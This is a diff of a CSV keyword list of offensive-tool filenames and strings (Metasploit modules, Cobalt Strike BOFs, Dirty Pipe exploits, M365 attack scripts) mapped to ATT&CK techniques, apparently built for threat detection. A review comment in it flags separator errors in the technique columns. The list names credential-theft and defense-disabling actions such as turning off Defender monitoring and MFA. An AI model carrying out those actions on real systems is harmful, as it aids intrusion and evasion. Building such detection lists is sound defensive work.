 "*dirty_sock/archive/master.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
 "*dirtycow*","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Dirty-Pipe/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z"
 "*dirtypipe-exploit/blob/main/dirtypipe.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","","N/A","","",""
 "*-DirtyPipe-Exploits*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","5","453","129","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
-"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
-"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Disable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
 "*DisableAllWindowsSoftwareFirewalls*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z"
-"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
 "*DisableAntiPhishing*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*DisableAntiPhishing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*disableeventvwr/*.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z"
-"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z"
+"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
 "*DisableMailboxAuditing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*DisableMFA.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
 "*DisableRealtimeMonitoring $true*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
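Review bot: The refreshed `*disable_clamav.*` and `*disable_clamav.rb*` rows still carry `T1204 -T1210` in `metadata_tool_techniques`, while every other item in that list is separated by ` - `; the field should read `T1204 - T1210`. A consumer that splits the column on that separator (presumably how rules map a hit to ATT&CK) would see `T1204 -T1210` as one unknown technique and lose both IDs. The same class of problem sits in context rows of this hunk that the commit leaves untouched: `T1550 T1555 T1212 T1558` with no separator on `*dirscanner.py*`, and lowercase `t1543` on two of the Dirty Pipe rows. Since this refresh already rewrites the rows to update star and fork counts, a format check on the technique and tactic columns in the same pass would catch these before they reach detection content.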
@@ -9345,7 +9493,7 @@
 "*DiskCryptor Device Installation Disk*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
 "*DiskCryptor driver*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
 "*DISKCRYPTOR_MUTEX*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
-"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*diskcryptor2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*DiskCryptor-master*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
 "*dist*_brc4.x64.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
 "*dist*_brc4.x86.o*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
@@ -9356,36 +9504,36 @@
 "*dist\shadow.exe*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
 "*ditty/ditty.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z"
 "*djhohnstein/SharpChromium*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z"
-"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*dlink_central_wifimanager_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*dlink_sharecenter_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*dlink_telnet_backdoor_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*dll* [HIJACKABLE]*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*dll\reflective_dll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10","","N/A","","",""
 "*dll_generator.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","",""
 "*dll_hijack_detect_x64*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*dll_hijack_detect_x86*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*dll_hijack_hunter*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
 "*DLL_Imports_BOF*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z"
-"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*dll_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
